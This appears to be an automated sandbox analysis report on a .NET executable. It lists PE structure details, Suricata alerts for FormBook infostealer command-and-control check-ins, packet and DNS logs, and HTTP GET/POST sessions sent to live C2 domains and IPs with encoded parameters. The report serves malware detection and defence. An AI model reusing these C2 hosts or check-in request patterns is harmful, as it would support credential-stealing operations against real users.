                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  push ebx
                                                  add byte ptr [ecx+00h], bh
                                                  jnc 00007F46691DB042h
                                                  je 00007F46691DB042h
                                                  add byte ptr [ebp+00h], ch
                                                  add byte ptr [ecx+00h], al
                                                  arpl word ptr [eax], ax
                                                  je 00007F46691DB042h
                                                  imul eax, dword ptr [eax], 00610076h
                                                  je 00007F46691DB042h
                                                  outsd
                                                  add byte ptr [edx+00h], dh
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xd73c10x4f.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xd80000x5cc.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xda0000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0xd4dcc0x70.text
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000xd543c0xd56002e38decb5f80ce770fcedfd020849cd6False0.8357899000439367data7.6234510150876185IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rsrc0xd80000x5cc0x600c243ecfbaccc870a0a2f77d118898039False0.427734375data4.110743151577604IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0xda0000xc0x20012ac662919a8444011ac95123ab9056dFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_VERSION0xd80900x33cdata0.42995169082125606
                                                  RT_MANIFEST0xd83dc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                  Imports

                                                  DLLImport
                                                  mscoree.dll_CorExeMain

                                                  Network Behavior

                                                  Suricata IDS Alerts

                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2024-12-10T14:22:11.788102+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1149868161.97.142.14480TCP
                                                  2024-12-10T14:22:11.788102+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1149868161.97.142.14480TCP
                                                  2024-12-10T14:22:29.605213+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149908107.155.56.3080TCP
                                                  2024-12-10T14:22:32.417853+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149914107.155.56.3080TCP
                                                  2024-12-10T14:22:35.089801+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1149921107.155.56.3080TCP
                                                  2024-12-10T14:22:37.852826+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1149928107.155.56.3080TCP
                                                  2024-12-10T14:22:37.852826+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1149928107.155.56.3080TCP
                                                  2024-12-10T14:22:45.652104+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114994713.228.81.3980TCP
                                                  2024-12-10T14:22:48.324205+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114995413.228.81.3980TCP
                                                  2024-12-10T14:22:50.980272+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.114996113.228.81.3980TCP
                                                  2024-12-10T14:22:53.708458+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.114996913.228.81.3980TCP
                                                  2024-12-10T14:22:53.708458+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.114996913.228.81.3980TCP

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Dec 10, 2024 14:22:10.380464077 CET4986880192.168.2.11161.97.142.144
                                                  Dec 10, 2024 14:22:10.499905109 CET8049868161.97.142.144192.168.2.11
                                                  Dec 10, 2024 14:22:10.500025034 CET4986880192.168.2.11161.97.142.144
                                                  Dec 10, 2024 14:22:10.510483980 CET4986880192.168.2.11161.97.142.144
                                                  Dec 10, 2024 14:22:10.630331039 CET8049868161.97.142.144192.168.2.11
                                                  Dec 10, 2024 14:22:11.787408113 CET8049868161.97.142.144192.168.2.11
                                                  Dec 10, 2024 14:22:11.787955999 CET8049868161.97.142.144192.168.2.11
                                                  Dec 10, 2024 14:22:11.787966967 CET8049868161.97.142.144192.168.2.11
                                                  Dec 10, 2024 14:22:11.787971973 CET8049868161.97.142.144192.168.2.11
                                                  Dec 10, 2024 14:22:11.787977934 CET8049868161.97.142.144192.168.2.11
                                                  Dec 10, 2024 14:22:11.787988901 CET8049868161.97.142.144192.168.2.11
                                                  Dec 10, 2024 14:22:11.788101912 CET4986880192.168.2.11161.97.142.144
                                                  Dec 10, 2024 14:22:11.788136005 CET4986880192.168.2.11161.97.142.144
                                                  Dec 10, 2024 14:22:11.793756962 CET4986880192.168.2.11161.97.142.144
                                                  Dec 10, 2024 14:22:11.913686991 CET8049868161.97.142.144192.168.2.11
                                                  Dec 10, 2024 14:22:27.948514938 CET4990880192.168.2.11107.155.56.30
                                                  Dec 10, 2024 14:22:28.067886114 CET8049908107.155.56.30192.168.2.11
                                                  Dec 10, 2024 14:22:28.067965984 CET4990880192.168.2.11107.155.56.30
                                                  Dec 10, 2024 14:22:28.094609022 CET4990880192.168.2.11107.155.56.30
                                                  Dec 10, 2024 14:22:28.214375019 CET8049908107.155.56.30192.168.2.11
                                                  Dec 10, 2024 14:22:29.605212927 CET4990880192.168.2.11107.155.56.30
                                                  Dec 10, 2024 14:22:29.647928953 CET8049908107.155.56.30192.168.2.11
                                                  Dec 10, 2024 14:22:29.648052931 CET4990880192.168.2.11107.155.56.30
                                                  Dec 10, 2024 14:22:29.648102999 CET8049908107.155.56.30192.168.2.11
                                                  Dec 10, 2024 14:22:29.648145914 CET4990880192.168.2.11107.155.56.30
                                                  Dec 10, 2024 14:22:29.724648952 CET8049908107.155.56.30192.168.2.11
                                                  Dec 10, 2024 14:22:29.724697113 CET4990880192.168.2.11107.155.56.30
                                                  Dec 10, 2024 14:22:30.753724098 CET4991480192.168.2.11107.155.56.30
                                                  Dec 10, 2024 14:22:30.873207092 CET8049914107.155.56.30192.168.2.11
                                                  Dec 10, 2024 14:22:30.873296976 CET4991480192.168.2.11107.155.56.30
                                                  Dec 10, 2024 14:22:30.905369997 CET4991480192.168.2.11107.155.56.30
                                                  Dec 10, 2024 14:22:31.024882078 CET8049914107.155.56.30192.168.2.11
                                                  Dec 10, 2024 14:22:32.417853117 CET4991480192.168.2.11107.155.56.30
                                                  Dec 10, 2024 14:22:32.432938099 CET8049914107.155.56.30192.168.2.11
                                                  Dec 10, 2024 14:22:32.433120966 CET8049914107.155.56.30192.168.2.11
                                                  Dec 10, 2024 14:22:32.433295965 CET4991480192.168.2.11107.155.56.30
                                                  Dec 10, 2024 14:22:32.433295965 CET4991480192.168.2.11107.155.56.30
                                                  Dec 10, 2024 14:22:32.537220955 CET8049914107.155.56.30192.168.2.11
                                                  Dec 10, 2024 14:22:32.537420988 CET4991480192.168.2.11107.155.56.30
                                                  Dec 10, 2024 14:22:33.436902046 CET4992180192.168.2.11107.155.56.30
                                                  Dec 10, 2024 14:22:33.556265116 CET8049921107.155.56.30192.168.2.11
                                                  Dec 10, 2024 14:22:33.556341887 CET4992180192.168.2.11107.155.56.30
                                                  Dec 10, 2024 14:22:33.582700014 CET4992180192.168.2.11107.155.56.30
                                                  Dec 10, 2024 14:22:33.702104092 CET8049921107.155.56.30192.168.2.11
                                                  Dec 10, 2024 14:22:33.702137947 CET8049921107.155.56.30192.168.2.11
                                                  Dec 10, 2024 14:22:35.089801073 CET4992180192.168.2.11107.155.56.30
                                                  Dec 10, 2024 14:22:35.131866932 CET8049921107.155.56.30192.168.2.11
                                                  Dec 10, 2024 14:22:35.132088900 CET4992180192.168.2.11107.155.56.30
                                                  Dec 10, 2024 14:22:35.209553957 CET8049921107.155.56.30192.168.2.11
                                                  Dec 10, 2024 14:22:35.209620953 CET4992180192.168.2.11107.155.56.30
                                                  Dec 10, 2024 14:22:36.108556032 CET4992880192.168.2.11107.155.56.30
                                                  Dec 10, 2024 14:22:36.291228056 CET8049928107.155.56.30192.168.2.11
                                                  Dec 10, 2024 14:22:36.291320086 CET4992880192.168.2.11107.155.56.30
                                                  Dec 10, 2024 14:22:36.302843094 CET4992880192.168.2.11107.155.56.30
                                                  Dec 10, 2024 14:22:36.422641039 CET8049928107.155.56.30192.168.2.11
                                                  Dec 10, 2024 14:22:37.852586985 CET8049928107.155.56.30192.168.2.11
                                                  Dec 10, 2024 14:22:37.852600098 CET8049928107.155.56.30192.168.2.11
                                                  Dec 10, 2024 14:22:37.852612019 CET8049928107.155.56.30192.168.2.11
                                                  Dec 10, 2024 14:22:37.852720976 CET8049928107.155.56.30192.168.2.11
                                                  Dec 10, 2024 14:22:37.852734089 CET8049928107.155.56.30192.168.2.11
                                                  Dec 10, 2024 14:22:37.852747917 CET8049928107.155.56.30192.168.2.11
                                                  Dec 10, 2024 14:22:37.852826118 CET4992880192.168.2.11107.155.56.30
                                                  Dec 10, 2024 14:22:37.852854967 CET8049928107.155.56.30192.168.2.11
                                                  Dec 10, 2024 14:22:37.852868080 CET8049928107.155.56.30192.168.2.11
                                                  Dec 10, 2024 14:22:37.852880001 CET8049928107.155.56.30192.168.2.11
                                                  Dec 10, 2024 14:22:37.852894068 CET4992880192.168.2.11107.155.56.30
                                                  Dec 10, 2024 14:22:37.852920055 CET4992880192.168.2.11107.155.56.30
                                                  Dec 10, 2024 14:22:37.852941036 CET8049928107.155.56.30192.168.2.11
                                                  Dec 10, 2024 14:22:37.852981091 CET4992880192.168.2.11107.155.56.30
                                                  Dec 10, 2024 14:22:37.857834101 CET4992880192.168.2.11107.155.56.30
                                                  Dec 10, 2024 14:22:37.977025986 CET8049928107.155.56.30192.168.2.11
                                                  Dec 10, 2024 14:22:44.003206968 CET4994780192.168.2.1113.228.81.39
                                                  Dec 10, 2024 14:22:44.122653008 CET804994713.228.81.39192.168.2.11
                                                  Dec 10, 2024 14:22:44.122827053 CET4994780192.168.2.1113.228.81.39
                                                  Dec 10, 2024 14:22:44.137403011 CET4994780192.168.2.1113.228.81.39
                                                  Dec 10, 2024 14:22:44.256776094 CET804994713.228.81.39192.168.2.11
                                                  Dec 10, 2024 14:22:45.652103901 CET4994780192.168.2.1113.228.81.39
                                                  Dec 10, 2024 14:22:45.709861994 CET804994713.228.81.39192.168.2.11
                                                  Dec 10, 2024 14:22:45.709939003 CET804994713.228.81.39192.168.2.11
                                                  Dec 10, 2024 14:22:45.709956884 CET4994780192.168.2.1113.228.81.39
                                                  Dec 10, 2024 14:22:45.710005045 CET4994780192.168.2.1113.228.81.39
                                                  Dec 10, 2024 14:22:45.771568060 CET804994713.228.81.39192.168.2.11
                                                  Dec 10, 2024 14:22:45.771702051 CET4994780192.168.2.1113.228.81.39
                                                  Dec 10, 2024 14:22:46.671345949 CET4995480192.168.2.1113.228.81.39
                                                  Dec 10, 2024 14:22:46.796120882 CET804995413.228.81.39192.168.2.11
                                                  Dec 10, 2024 14:22:46.796211958 CET4995480192.168.2.1113.228.81.39
                                                  Dec 10, 2024 14:22:46.811913967 CET4995480192.168.2.1113.228.81.39
                                                  Dec 10, 2024 14:22:46.982526064 CET804995413.228.81.39192.168.2.11
                                                  Dec 10, 2024 14:22:48.324204922 CET4995480192.168.2.1113.228.81.39
                                                  Dec 10, 2024 14:22:48.443963051 CET804995413.228.81.39192.168.2.11
                                                  Dec 10, 2024 14:22:48.444041967 CET4995480192.168.2.1113.228.81.39
                                                  Dec 10, 2024 14:22:49.343090057 CET4996180192.168.2.1113.228.81.39
                                                  Dec 10, 2024 14:22:49.462692976 CET804996113.228.81.39192.168.2.11
                                                  Dec 10, 2024 14:22:49.462764025 CET4996180192.168.2.1113.228.81.39
                                                  Dec 10, 2024 14:22:49.478758097 CET4996180192.168.2.1113.228.81.39
                                                  Dec 10, 2024 14:22:49.600447893 CET804996113.228.81.39192.168.2.11
                                                  Dec 10, 2024 14:22:49.601334095 CET804996113.228.81.39192.168.2.11
                                                  Dec 10, 2024 14:22:50.980272055 CET4996180192.168.2.1113.228.81.39
                                                  Dec 10, 2024 14:22:51.057413101 CET804996113.228.81.39192.168.2.11
                                                  Dec 10, 2024 14:22:51.057549000 CET4996180192.168.2.1113.228.81.39
                                                  Dec 10, 2024 14:22:51.100074053 CET804996113.228.81.39192.168.2.11
                                                  Dec 10, 2024 14:22:51.100172997 CET4996180192.168.2.1113.228.81.39
                                                  Dec 10, 2024 14:22:51.999423981 CET4996980192.168.2.1113.228.81.39
                                                  Dec 10, 2024 14:22:52.119149923 CET804996913.228.81.39192.168.2.11
                                                  Dec 10, 2024 14:22:52.119421005 CET4996980192.168.2.1113.228.81.39
                                                  Dec 10, 2024 14:22:52.133733988 CET4996980192.168.2.1113.228.81.39
                                                  Dec 10, 2024 14:22:52.253237963 CET804996913.228.81.39192.168.2.11
                                                  Dec 10, 2024 14:22:53.708259106 CET804996913.228.81.39192.168.2.11
                                                  Dec 10, 2024 14:22:53.708405018 CET804996913.228.81.39192.168.2.11
                                                  Dec 10, 2024 14:22:53.708457947 CET4996980192.168.2.1113.228.81.39
                                                  Dec 10, 2024 14:22:53.711781979 CET4996980192.168.2.1113.228.81.39
                                                  Dec 10, 2024 14:22:53.831177950 CET804996913.228.81.39192.168.2.11

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Dec 10, 2024 14:22:09.725912094 CET5043153192.168.2.111.1.1.1
                                                  Dec 10, 2024 14:22:10.373446941 CET53504311.1.1.1192.168.2.11
                                                  Dec 10, 2024 14:22:26.843626022 CET6012053192.168.2.111.1.1.1
                                                  Dec 10, 2024 14:22:27.868122101 CET6012053192.168.2.111.1.1.1
                                                  Dec 10, 2024 14:22:27.913952112 CET53601201.1.1.1192.168.2.11
                                                  Dec 10, 2024 14:22:28.008621931 CET53601201.1.1.1192.168.2.11
                                                  Dec 10, 2024 14:22:42.874470949 CET6056053192.168.2.111.1.1.1
                                                  Dec 10, 2024 14:22:43.886528969 CET6056053192.168.2.111.1.1.1
                                                  Dec 10, 2024 14:22:44.000518084 CET53605601.1.1.1192.168.2.11
                                                  Dec 10, 2024 14:22:44.023289919 CET53605601.1.1.1192.168.2.11
                                                  Dec 10, 2024 14:22:58.718369961 CET5959153192.168.2.111.1.1.1
                                                  Dec 10, 2024 14:22:58.954385042 CET53595911.1.1.1192.168.2.11

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Dec 10, 2024 14:22:09.725912094 CET192.168.2.111.1.1.10x821bStandard query (0)www.070001325.xyzA (IP address)IN (0x0001)false
                                                  Dec 10, 2024 14:22:26.843626022 CET192.168.2.111.1.1.10x29c2Standard query (0)www.expancz.topA (IP address)IN (0x0001)false
                                                  Dec 10, 2024 14:22:27.868122101 CET192.168.2.111.1.1.10x29c2Standard query (0)www.expancz.topA (IP address)IN (0x0001)false
                                                  Dec 10, 2024 14:22:42.874470949 CET192.168.2.111.1.1.10x72caStandard query (0)www.taxiquynhonnew.clickA (IP address)IN (0x0001)false
                                                  Dec 10, 2024 14:22:43.886528969 CET192.168.2.111.1.1.10x72caStandard query (0)www.taxiquynhonnew.clickA (IP address)IN (0x0001)false
                                                  Dec 10, 2024 14:22:58.718369961 CET192.168.2.111.1.1.10xb271Standard query (0)www.epitomize.shopA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Dec 10, 2024 14:22:10.373446941 CET1.1.1.1192.168.2.110x821bNo error (0)www.070001325.xyz161.97.142.144A (IP address)IN (0x0001)false
                                                  Dec 10, 2024 14:22:27.913952112 CET1.1.1.1192.168.2.110x29c2No error (0)www.expancz.top107.155.56.30A (IP address)IN (0x0001)false
                                                  Dec 10, 2024 14:22:28.008621931 CET1.1.1.1192.168.2.110x29c2No error (0)www.expancz.top107.155.56.30A (IP address)IN (0x0001)false
                                                  Dec 10, 2024 14:22:44.000518084 CET1.1.1.1192.168.2.110x72caNo error (0)www.taxiquynhonnew.clickdns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                                                  Dec 10, 2024 14:22:44.000518084 CET1.1.1.1192.168.2.110x72caNo error (0)dns.ladipage.com13.228.81.39A (IP address)IN (0x0001)false
                                                  Dec 10, 2024 14:22:44.000518084 CET1.1.1.1192.168.2.110x72caNo error (0)dns.ladipage.com18.139.62.226A (IP address)IN (0x0001)false
                                                  Dec 10, 2024 14:22:44.000518084 CET1.1.1.1192.168.2.110x72caNo error (0)dns.ladipage.com54.179.173.60A (IP address)IN (0x0001)false
                                                  Dec 10, 2024 14:22:44.023289919 CET1.1.1.1192.168.2.110x72caNo error (0)www.taxiquynhonnew.clickdns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                                                  Dec 10, 2024 14:22:44.023289919 CET1.1.1.1192.168.2.110x72caNo error (0)dns.ladipage.com54.179.173.60A (IP address)IN (0x0001)false
                                                  Dec 10, 2024 14:22:44.023289919 CET1.1.1.1192.168.2.110x72caNo error (0)dns.ladipage.com18.139.62.226A (IP address)IN (0x0001)false
                                                  Dec 10, 2024 14:22:44.023289919 CET1.1.1.1192.168.2.110x72caNo error (0)dns.ladipage.com13.228.81.39A (IP address)IN (0x0001)false
                                                  Dec 10, 2024 14:22:58.954385042 CET1.1.1.1192.168.2.110xb271Name error (3)www.epitomize.shopnonenoneA (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • www.070001325.xyz
                                                  • www.expancz.top
                                                  • www.taxiquynhonnew.click

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.1149868161.97.142.14480732C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 10, 2024 14:22:10.510483980 CET545OUTGET /gebt/?2z=xX0xzrrpPjmP&jHm4GXr=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwk8JqRcnVFwPpJc4SLJsBBMTTXejr8neKA= HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US,en;q=0.9
                                                  Host: www.070001325.xyz
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                  Dec 10, 2024 14:22:11.787408113 CET1236INHTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Tue, 10 Dec 2024 13:22:11 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Content-Length: 2966
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  ETag: "66cce1df-b96"
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                  Dec 10, 2024 14:22:11.787955999 CET224INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                  Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-tex
                                                  Dec 10, 2024 14:22:11.787966967 CET1236INData Raw: 74 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 30 37 30 37 30 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 31 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 32 35 65 6d 3b 0a 09 09 09 09 6c 69
                                                  Data Ascii: t {color: #707070;letter-spacing: -0.01em;font-size: 1.25em;line-height: 20px;}.footer {margin-top: 40px;font-size: 0.7em;}.animate__delay-1s {animation-delay: 1s;}@keyframes fadeIn
                                                  Dec 10, 2024 14:22:11.787971973 CET224INData Raw: 2d 32 30 2e 36 33 35 2d 34 36 2d 34 36 2d 34 36 7a 22 0a 09 09 09 09 09 09 09 3e 3c 2f 70 61 74 68 3e 0a 09 09 09 09 09 09 3c 2f 73 76 67 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 63 6c 61 73 73 3d 22 61 6e 69 6d 61 74
                                                  Data Ascii: -20.635-46-46-46z"></path></svg></div><h1 class="animate__animated animate__fadeIn">Page Not Found</h1><div class="description-text animate__animated animate__fadeIn animate__delay-1s">
                                                  Dec 10, 2024 14:22:11.787977934 CET250INData Raw: 09 3c 70 3e 4f 6f 70 73 21 20 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 74 68 65 20 70 61 67 65 20 74 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 3c 2f 70 3e 0a 09 09 09 09 09 09 3c 70 3e 50 6c 65 61 73 65 20 63
                                                  Data Ascii: <p>Oops! We couldn't find the page that you're looking for.</p><p>Please check the address and try again.</p><section class="footer"><strong>Error Code:</strong> 404</section></div></div></div></div></body><


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.1149908107.155.56.3080732C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 10, 2024 14:22:28.094609022 CET806OUTPOST /2gcl/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.expancz.top
                                                  Origin: http://www.expancz.top
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Content-Length: 204
                                                  Cache-Control: max-age=0
                                                  Referer: http://www.expancz.top/2gcl/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
